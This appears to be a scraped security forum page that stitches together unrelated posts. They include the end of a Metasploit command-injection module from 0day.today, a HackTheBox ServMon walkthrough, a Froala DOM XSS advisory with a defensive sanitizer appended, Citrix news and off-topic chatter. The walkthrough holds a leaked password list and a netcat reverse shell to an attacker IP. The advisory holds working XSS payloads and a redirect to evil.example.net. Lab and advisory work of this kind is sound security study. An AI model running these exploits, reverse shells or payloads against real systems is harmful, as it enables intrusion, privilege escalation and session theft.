      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'ajax.php'),
      'cookie' => @cookie,
      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
      'Referer' => full_uri('index.php'),
      'vars_get' => {
        'sec' => 'eventos',
        'sec2' => 'operation/events/events'
      },
      'vars_post' => {
        'page' => 'include/ajax/events',
        'perform_event_response' => '10000000',
        'target' => cmd.to_s,
        'response_id' => '1'
      }
    }, 0) # the server will not send a response, so the module shouldn't wait for one
  end

  def exploit
    login(datastore['USERNAME'], datastore['PASSWORD'])
    if target.arch.first == ARCH_CMD
      execute_command payload.encoded
    else
      execute_cmdstager(background: true)
    end
  end
end

# 0day.today [2020-07-12] #
Source
  17. DarkOs

DarkOs An Arch Based Distro | Status: Beta | Brought to you by: ybenel

Dark OS Is A Linux Operating System Based On Arch Linux, Designed To Create A More Enjoyable User Experience And Easy To Use. It Comes With 3 Editions (One Hell - Soopertrack - Schmedding), Each Edition Has Its Own Desktop / Window Manager And Package List.

DarkOs "One Hell" Edition Comes With Plasma Desktop Environment And A Minimal Amount Of Packages.

DarkOs "Soopertrack" Edition Comes With No Desktop Or Window Manager But Uses LXDE As A Temporary Environment To Provide You With The Installer, And It'll Be Removed Once The Installation Is Finished. It Also Comes With No Essential Packages Such As (Browser, Text Editor, Terminal ...etc) So You'll Get To Choose What You Want.

DarkOs "Schmedding" Comes With No Desktop Or Window Manager Nor An Installer And Has No Packages So You Could Enjoy The Experience As If You Were Installing Arch Linux.

Features
- Minimal And Easy
- Gives You Full Control
- Customize What You Want
- Enjoy Using Linux
- Similar To Arch Linux (80%)
- Choose What's Perfect For You

Screenshot:

Download

Source: https://sourceforge.net/projects/darkos-arch/
  18. Earlier this week, Citrix released security updates for Citrix Application Delivery Controller (ADC), Citrix Gateway, and the Citrix SD-WAN WANOP appliance, and urged admins to apply them as soon as possible to reduce risk. At the time, there was no public attack code and no indication that any of the fixed flaws were getting actively exploited. On Thursday, though, SANS ISC’s Dr. Johannes Ullrich spotted attackers attempting to exploit two of the Citrix vulnerabilities on his F5 BigIP honeypot (set up to flag CVE-2020-5902 exploitation attempts).

About the vulnerabilities

The fixed flaws are 11 in total, ranging from information disclosure and DoS bugs to elevation of privilege, XSS and code injection flaws. He also pointed out that of the 11 vulnerabilities, there are six possible attack routes, and five of those have barriers to exploitation. Finally, he added that the vulnerabilities have no link to CVE-2019-19781, the remote code execution flaw that’s been heavily exploited by attackers since late December/early January.

About the recent exploitation attempts

Dr. Ullrich said that they are seeing some scans that are looking for systems that haven’t been patched yet. One of the exploited vulnerabilities allows arbitrary file downloads, the other allows retrieval of a PCI-DSS report without authentication.

Via helpnetsecurity.com
  19. I haven't read the whole article, but I have a feeling that instead of beer, mici and mustard they'll be getting free internet; as for the vulnerabilities, all the nephews will vote.
  20. ServMon retired today. ServMon is an easy-rated Windows machine on the HackTheBox platform. Its IP is 10.10.10.184. Feel free to check out my hackthebox profile yky4u. Respect me if I helped you. Let’s begin!

Enumeration

Let’s do an nmap scan on 10.10.10.184: -sC for default scripts, -sV for version detection, -p- for all ports.

[root@H0ST: ~/HTB/servmon]$ nmap -sC -sV -p- 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 12:15 BST
Nmap scan report for 10.10.10.184
Host is up (0.086s latency).
Not shown: 65517 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp    open  http
| fingerprint-strings:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5666/tcp  open  tcpwrapped
6063/tcp  open  tcpwrapped
6699/tcp  open  napster?
8443/tcp  open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m20s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-06-19T11:23:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 315.00 seconds

FTP allows anonymous login on port 21. We discovered two users and two interesting files. Let’s download them and see what they are.

Nadine — Confidential.txt

[root@H0ST: ~/HTB/servmon]$ cat Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nathan — Notes to do.txt

[root@H0ST: ~/HTB/servmon]$ cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

There is a web application, NVMS-1000, on port 80, which has a directory traversal vulnerability. The exploit can be found on exploit-db.
NVMS-1000-Directory-Traversal

Let’s have a look at the exploit:

# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Let’s try to retrieve files on Nathan’s Desktop using the directory traversal vulnerability. We found seven passwords in a file named Password.txt. Here are the passwords:

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

We need to find out the correct credentials. We can do it by using crackmapexec or hydra. The valid credentials are Nadine:L1k3B1gBut7s@W0rk. We are able to use those credentials to log in to SSH.

Privilege Escalation

The NSClient++ web application is running on port 8443. Run the command to obtain the password. Let’s route the traffic from 10.10.10.184:8443 to 127.0.0.1:8443 using SSH.

ssh -L 8443:127.0.0.1:8443 Nadine@10.10.10.184

We browsed to http://127.0.0.1:8443 and we can see the web application prompting for a password; enter ew2x6SsGTxjRwXOT to log in to the application. We can use the NSClient++ 0.5.2.35 — Privilege Escalation exploit. Take a look at what it is:

Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64

Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administrator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.

The user is able to enable the modules to check external scripts and schedule those scripts to run. There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation. A reboot, as far as I can tell, is required to reload and read the changes to the web config.

Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.

Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
C:\Program Files\NSClient++>nscp web -- password --display
Current password: SoSecret

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

3. Download nc.exe and evil.bat to c:\temp from attacking machine
@echo off
c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

4. Setup listener on attacking machine
nc -nlvvp 443

5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
- foobar
command = c:\temp\evil.bat

6. Add schedule to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
- foobar
interval = 1m
command = foobar

7. Restart the computer and wait for the reverse shell on attacking machine
nc -nlvvp 443
listening on [any] 443 ...
connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
Microsoft Windows [Version 10.0.17134.753]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

Risk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System

Check the version of NSClient++ by running nscp test. We can confirm it is vulnerable. Let’s create evil.bat and put it in the C:\Temp directory.

[root@H0ST: ~/HTB/servmon]$ cat evil.bat
@echo off
c:\temp\nc.exe 10.10.14.23 4444 -e cmd.exe

Download evil.bat and nc.exe to the box using PowerShell. Go to scripts and put c:\temp\evil.bat into the Value field to create a script that runs evil.bat. Go to Scheduler and set the Value to interval = 1m. Listen on port 4444. Click Control, then click the Reload button. We have a reverse shell as nt authority\system now.

Source
  21. PatternAnalyzer The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use. This project was created for the "Security of wireless and mobile network communications" class of 2019. ICSD Department of University of Aegean. Download Source
  22. #############################################################
#
# Product:  Froala WYSIWYG HTML Editor
# Vendor:   Froala
# CSNC ID:  CSNC-2020-004
# CVE ID:   CVE-2019-19935
# Subject:  DOM XSS in Froala WYSIWYG HTML Editor
# Severity: Medium
# Effect:   Remotely exploitable
# Author:   Emanuel Duss <emanuel.duss@compass-security.com>
# Date:     2020-07-01
#
#############################################################

Introduction
------------

Froala WYSIWYG HTML Editor is a lightweight WYSIWYG HTML Editor written in JavaScript that enables rich text editing capabilities for web applications [1]. Froala sanitizes the user input in order to prevent cross-site scripting attacks [2].

During a web application penetration test, Compass found a DOM-based cross-site scripting (XSS) [3] in the Froala WYSIWYG HTML Editor. HTML code in the editor is not correctly sanitized when inserted into the DOM. This allows an attacker that can control the editor content to execute arbitrary JavaScript in the context of the victim's session.

Affected
--------

* All versions of the Froala WYSIWYG HTML Editor

The issue was found in December 2019 in version 3.0.6 and was still not fixed in July 2020 in version 3.1.1.

Technical Summary
-----------------

It's possible to perform DOM based XSS in the Froala editor by inserting the `<iframe>` tag and the `srcdoc` attribute into the editor:

<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>

This can be verified by inserting the payload into the "Code View" of the editor. In this case, this would be a self-XSS because the users would only attack themselves. However, it could be possible that untrusted data from a non-controlled source is loaded into the editor in order to exploit it. An example could be a web application where multiple users can edit the same content using this editor.

An attacker can use this to execute their own JavaScript code in the session of the victim. This can be abused to read the content of the victim's account, use the session to make further requests to the web application or read the cookies or web storage.

Technical Details
-----------------

# Correct Behavior

According to the Froala tech support page "Why is the <script> tag being removed?", the `<script>` tag is removed in order to prevent possible XSS attacks [2]. Other XSS payloads that use other HTML tags and event handlers are also removed from the DOM before they are inserted.

This can be verified using a PoC hosted on `poc.example.net` that inserts potentially untrusted data with a `<script>` tag into the editor:

<link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_style.min.css" rel="stylesheet" type="text/css" />
<link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_editor.pkgd.min.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/js/froala_editor.pkgd.min.js"></script>

<div id="froala-editor"></div>

<script>
  let editor = new FroalaEditor('div#froala-editor', {}, function() {
    // This data could be loaded from a potentially untrusted source, e.g. from an API via an XMLHttpRequest
    data = "<s>Hello<\/s><script>console.log(document.domain)<\/script><u>Compass<\/u>";

    // Inserting untrusted data into the editor
    editor.html.set(data);

    // Show how the untrusted data is embedded into the DOM
    console.log(editor.html.get());
  })
</script>

The JavaScript console shows that legit HTML tags like `<s>` or `<u>` were inserted into the DOM but the `<script>` tag was correctly removed (as expected) and therefore the JavaScript was not executed:

<p><s>Hello</s><u>Compass</u></p>

The same can be done by inserting an `<img>` tag with an `onerror` event handler as an XSS vector:

[...]
data = "<s>Hello<\/s><img src=x onerror=console.log(document.domain)><u>Compass<\/u>";
[...]

The JavaScript console again shows that the legit HTML tags were inserted and also the `<img>` tag, but without the used `onerror` event handler. Therefore, the JavaScript was not executed:

<p><s>Hello</s><img src="x" class="fr-fic fr-dii"><u>Compass</u></p>

This shows that it's not possible to load and execute common XSS payloads into the editor.

# XSS Bypass

I tried every event handler from the awesome PortSwigger XSS cheat sheet [4], but all of them were blocked. Thanks to the XSS cheat sheet, I found an HTML tag with an attribute that does not start with `on`, which can execute JavaScript in the origin of the website. This tag was not filtered. It's the `<iframe>` tag with the `srcdoc` attribute.

The `srcdoc` attribute specifies the HTML content of the page to show in the inline frame [5]. This can be used to embed JavaScript code. The code runs in the origin of the website where the iframe is embedded.

Working XSS payload:

[...]
data = "<s>Hello<\/s><iframe srcdoc=\"<img src=x onerror=console.log(document.domain)>\"><\/iframe><u>Compass<\/u>";
[...]

The JavaScript console shows that the `<iframe>` tag with the `srcdoc` attribute was inserted into the DOM without sanitizing. Also the content of the iframe with the `<img>` tag and the `onerror` event handler was not sanitized. Further, the origin on which the PoC website is hosted is printed:

<p><s>Hello</s><iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe><u>Compass</u></p>
poc.example.net

Therefore, this shows that the following XSS payload can be used in order to inject and execute JavaScript into the DOM, which results in a DOM-based XSS:

<iframe srcdoc="<img src=x onerror=console.log(document.domain)>"></iframe>

Note: The `<img>` tag with the `onerror` event handler is only the data content of the `srcdoc` attribute and no code for the browser. This is rendered into code later when the content of the iframe is built.

The injected JavaScript code runs in the origin of the website where the Froala editor is running. The next section explains why I mention this explicitly.

XSS with Undefined / Empty Origin
---------------------------------

There are several issues marked as open and fixed in the Froala GitHub repository regarding XSS [6]. The closed ones are also not fixed at the moment. However, most of these XSS are running in another origin than the website where the editor is loaded.

# Example 1

For example, the issue #3270 [7] that is marked as closed and uses an embedded object (`<embed>` tag) in order to execute JavaScript:

[...]
data = "<EMBED/SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+Y29uc29sZS5sb2coZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pjwvc3ZnPgo=\">"
[...]

The base64 decoded payload is an SVG image containing JavaScript:

<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss">
  <script type="text/ecmascript">console.log(document.domain)</script>
</svg>

The JavaScript console shows that the code is executed but the origin is `undefined`:

<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+Y29uc29sZS5sb2coZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pjwvc3ZnPgo="></p>
undefined

# Example 2

Another example is the issue #3039 [8] that is marked as closed and uses the `<object>` tag to embed HTML / JavaScript code:

[...]
data = "<object data='data:text/html,<svg onload=console.log(document.domain)>'>";
[...]

The JavaScript console shows that the code is executed but the origin is empty:

<p><object data="data:text/html,<svg onload=console.log(document.domain)>"></object></p>
// empty line

# Exploiting XSS with Undefined / Empty Origins

Because the origin is not the same as where the PoC is hosted, it's not a typical XSS where an attacker could read the content of the victim's website, use the session to make further requests or access the cookies or web storage.

It is however still possible to perform arbitrary redirects to other websites using the reference to the `window.top.location`:

[...]
data = "<object data='data:text/html,<svg onload=window.top.location=\"http://evil.example.net/\">'>";
[...]

This redirects to http://evil.example.net/.

The same applies for the embed tag:

[...]
data = "<EMBED/SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj4KICA8c2NyaXB0PndpbmRvdy50b3AubG9jYXRpb249Imh0dHA6Ly9ldmlsLmV4YW1wbGUubmV0LyI8L3NjcmlwdD4KPC9zdmc+Cg==\">"
[...]

Decoded base64 payload:

<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="xss">
  <script>window.top.location="http://evil.example.net/"</script>
</svg>

This also redirects to http://evil.example.net/.

This is not as nice and powerful as the "real" XSS attack from the beginning, but still something ;-).

Vulnerability Classification
----------------------------

CVSS v3.1 Metrics [9]:

* CVSS Base Score: 6.1
* CVSS Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Remediation
-----------

This XSS issue is not fixed. The vendor can't tell any exact release date for a fixed version. Therefore, only trusted data or data that is already sanitized should be loaded into the editor.

# 0day.today [2020-07-05] #
Source
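The advisory's core lesson is that a sanitizer which only removes `<script>` and `on*` attributes cannot see that `srcdoc` carries a whole document. The following added example (not code from the Compass advisory or from Froala) contrasts that blocklist behaviour with an allowlist sanitizer over a minimal, hypothetical tokenizer; the tag and attribute allowlists, the `DROP_WITH_CONTENT` set and `isSafeUrl` are my own choices, and the tokenizer is not a full HTML5 parser.

```javascript
// Added example (not from the Compass advisory or Froala): a blocklist sanitizer
// reproducing the behaviour the advisory observed (drop <script>, strip on* handlers)
// beside an allowlist sanitizer that also refuses <iframe>/<object>/<embed> and
// data:/javascript: URLs. Minimal, hypothetical tokenizer; not an HTML5 parser.
const BLOCKED_TAGS = new Set(['script']);
const ALLOWED_TAGS = new Set(['p', 's', 'u', 'b', 'i', 'br', 'a', 'img']);
const ALLOWED_ATTRS = { a: new Set(['href']), img: new Set(['src', 'alt']) };
// Tags whose inner content is code or an embedded document rather than text.
const DROP_WITH_CONTENT = new Set(['script', 'style', 'iframe', 'object', 'embed', 'svg', 'math']);

// Split the inside of a tag ('iframe srcdoc="..."') into a name and attributes.
function parseTag(inner) {
  const closing = inner.startsWith('/');
  const body = closing ? inner.slice(1) : inner;
  const m = /^([a-zA-Z][\w-]*)/.exec(body);
  if (!m) return { type: 'text', value: `<${inner}>` };
  // name, optionally = "double", 'single' or bare value; '/' is not a name character,
  // so the advisory's <EMBED/SRC=...> spelling still yields a src attribute.
  const attrRe = /([^\s=\/"'<>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  attrRe.lastIndex = m[0].length;
  const attrs = [];
  for (let a; (a = attrRe.exec(body)) !== null;) {
    attrs.push({ name: a[1].toLowerCase(), value: a[2] ?? a[3] ?? a[4] ?? '' });
  }
  return { type: closing ? 'end' : 'start', name: m[1].toLowerCase(), attrs };
}

// Tokenize into text and tag tokens. A '>' inside a quoted attribute value (the <img ...>
// inside srcdoc="...") is data, not the end of the tag, so quote state is tracked.
function tokenize(html) {
  const tokens = [];
  for (let i = 0; i < html.length;) {
    if (html[i] !== '<') {
      const next = html.indexOf('<', i);
      const end = next === -1 ? html.length : next;
      tokens.push({ type: 'text', value: html.slice(i, end) });
      i = end;
      continue;
    }
    let j = i + 1;
    for (let quote = null; j < html.length; j++) {
      const c = html[j];
      if (quote) { if (c === quote) quote = null; }
      else if (c === '"' || c === "'") quote = c;
      else if (c === '>') break;
    }
    if (j >= html.length) { tokens.push({ type: 'text', value: html.slice(i) }); break; }
    tokens.push(parseTag(html.slice(i + 1, j)));
    i = j + 1;
  }
  return tokens;
}

function serialize(tokens) {
  return tokens.map((t) => {
    if (t.type === 'text') return t.value.replace(/</g, '&lt;');
    if (t.type === 'end') return `</${t.name}>`;
    return `<${t.name}${t.attrs.map((a) => ` ${a.name}="${a.value.replace(/"/g, '&quot;')}"`).join('')}>`;
  }).join('');
}

// Relative URLs and http(s)/mailto pass. Leading control characters and whitespace
// are stripped first because browsers ignore them in front of the scheme.
function isSafeUrl(value) {
  const scheme = /^([a-z][a-z0-9+.-]*):/.exec(value.replace(/[\u0000-\u0020]/g, '').toLowerCase());
  return scheme === null || ['http', 'https', 'mailto'].includes(scheme[1]);
}

// Blocklist: drops <script> and on* handlers. srcdoc is neither, so the advisory's
// <iframe srcdoc="..."> payload passes through untouched.
function blocklistSanitize(html) {
  const out = []; let skipping = null;
  for (const t of tokenize(html)) {
    if (skipping) { if (t.type === 'end' && t.name === skipping) skipping = null; continue; }
    if (t.type === 'start' && BLOCKED_TAGS.has(t.name)) { skipping = t.name; continue; }
    if (t.type === 'start') t.attrs = t.attrs.filter((a) => !a.name.startsWith('on'));
    out.push(t);
  }
  return serialize(out);
}

// Allowlist: unknown tags are dropped (their text is kept); tags carrying code or an
// embedded document are dropped with their content, and with everything after them
// if they are never closed, so the sanitizer fails closed rather than open.
function allowlistSanitize(html) {
  const out = []; let skipping = null;
  for (const t of tokenize(html)) {
    if (skipping) { if (t.type === 'end' && t.name === skipping) skipping = null; continue; }
    if (t.type === 'text') { out.push(t); continue; }
    if (!ALLOWED_TAGS.has(t.name)) {
      if (t.type === 'start' && DROP_WITH_CONTENT.has(t.name)) skipping = t.name;
      continue;
    }
    if (t.type === 'start') {
      const allowed = ALLOWED_ATTRS[t.name] || new Set();
      t.attrs = t.attrs.filter((a) => allowed.has(a.name) && (!['href', 'src'].includes(a.name) || isSafeUrl(a.value)));
    }
    out.push(t);
  }
  return serialize(out);
}
```

Run `blocklistSanitize` and `allowlistSanitize` on the advisory's `<iframe srcdoc=...>` payload: the first returns it unchanged, the second returns only `<s>Hello</s><u>Compass</u>`.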
  23. Bunicu' again, still on IRC; he was an op on several channels (#).
  24. I met him recently (this year) and he told me he didn't know whether we'd see each other again; he was depressed (in mourning), if we're talking about the same person.